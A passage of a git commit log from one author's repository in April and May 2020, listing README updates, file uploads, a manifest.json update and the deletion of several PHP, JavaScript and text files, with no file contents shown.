Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Wed May 6 10:19:09 2020 +0000

    Update README.md

commit e3f6ea3a5e0a55c34cd43a3858134279b06dc3e0
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Wed May 6 10:02:00 2020 +0000

    Update README.md

commit ad49bfcb02a165d838c791c961264ed382942b48
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Apr 25 21:38:51 2020 +0000

    Delete yt2.php

commit 857f444f576e4692649153d8d3784223f76d73c6
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Apr 25 21:38:40 2020 +0000

    Delete yt.php

commit 1d10306dc42ac0e4cd6c8d3cf011b0cae96760f9
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 23 17:03:59 2020 +0000

    Update README.md

commit 5c09551ac553ca0524efd83b321430b3ef9740c8
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 23 05:56:38 2020 +0000

    Update README.md

commit 3fb4c7ea889afe04bbd758d3d13f4ed41f03d160
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 23 05:56:17 2020 +0000

    Update README.md

commit 2bc8da38b2eadd896c04ccffd61d1dba4700e416
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Tue Apr 21 02:48:30 2020 +0000

    Update README.md

commit 80538eb11b801f477c023535f29c62488d3c837b
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Tue Apr 21 02:41:50 2020 +0000

    Update README.md

commit 026a4ad26ea3f0309b14ba43be689998ea8c014d
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Tue Apr 21 01:34:09 2020 +0000

    Update manifest.json

commit af572128fabbd093591c41d07742394fa6c048e2
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Tue Apr 21 01:33:03 2020 +0000

    Delete log.js

commit 731b11efbc05f8a5fa60295f355fd4fa02c07b99
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Tue Apr 21 01:32:52 2020 +0000

    Delete km.js

commit 1765f07223df3f95a9a830218eff6091064e682f
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Tue Apr 21 01:31:34 2020 +0000

    Update README.md

commit 84831bbeda59005ddffa64c0483d7c434adb974d
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Fri Apr 17 00:25:44 2020 +0000

    Update README.md

commit 3ff393e8c8339f750d4c143c6e64f2aec8e5ea84
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Fri Apr 17 00:24:24 2020 +0000

    Update README.md

commit 7d04114e92c66a6defd811c2e831f4929fd4e2cd
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Fri Apr 17 00:21:02 2020 +0000

    Update README.md

commit bbb99021664223414c7403aae9ac951ac47bf3d8
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Fri Apr 17 00:17:35 2020 +0000

    Update README.md

commit a474b0db04f3127f29efc58054a3ca042a395b3c
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Fri Apr 17 00:15:30 2020 +0000

    Update README.md

commit dd429bf6caef7a4fd380c33d4bd271a1b2b708ce
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Fri Apr 17 00:13:42 2020 +0000

    Update README.md

commit 0ffea0ac8f695fc00afe90f6b27c686e6c04def2
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Fri Apr 17 00:10:59 2020 +0000

    Update README.md

commit 679e9b086d437e866526e612532debed970788e9
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 12:21:16 2020 +0100

    Update README.md

commit 416dd5250e1d5f142ebc19e5f4171008d6f9725b
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 10:41:41 2020 +0000

    Update README.md

commit cb542481c5e05689dd1ac1b1615785b5b87e814d
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 09:55:54 2020 +0000

    Update README.md

commit cfc91ea72a92fa4ff11dd48d43863cbde95a9585
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 09:49:45 2020 +0000

    Update README.md

commit c46adfcb98138975232e3c6ab1c55d1ff5066421
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 09:42:36 2020 +0000

    Update README.md

commit dbb17891806bbcc50b80507b1b11520bc217331c
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 10:31:53 2020 +0100

    Update README.md

commit f82fe1706fe1cd110c5f0bacf54c5e64b1b308b0
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 10:26:08 2020 +0100

    Delete dump.txt

commit f09b48850b969641e7af458e470f11712e547e82
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 10:25:17 2020 +0100

    Update README.md

commit 4a62e5b14fd3ff2eefe783c6943924092171bf83
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 09:02:33 2020 +0100

    Add files via upload

commit fa76fc7f632c4e8fec8d1b18043c588a7b17c74f
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 09:00:53 2020 +0100

    Add files via upload

commit e9084f2f7eeeea51375169f5d61477f68bd73e89
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:57:33 2020 +0100

    Add files via upload

commit 0ae77064972adc1a81b959b8f61ca1be32b8d66d
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:52:28 2020 +0100

    Add files via upload

commit d98cddf048f4ea2ec28e0329548226eb8950fcf7
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:49:23 2020 +0100

    Add files via upload

commit 47ddd00d27505f184d1a055652353a4d2e8120f8
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:46:51 2020 +0100

    Add files via upload

commit f50194bc7213cc750119a0e2c0954de63d6eba48
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:43:30 2020 +0100

    Add files via upload

commit 506e733a253b93ab191008946ef41796c27aa5fd
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:41:14 2020 +0100

    Update README.md

commit 3ab75f413e6eff0b7cd0dcfce0b5b025d00fde1f
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:37:27 2020 +0100

    Update README.md

commit e18b88adca1b3c224112e86629e8b3e0f5e76f7f
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:33:10 2020 +0100

    Update README.md

commit 3179056343abc2aa39490a86ef032e07748156ec
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Thu Apr 16 08:29:09 2020 +0100

    Create README.md
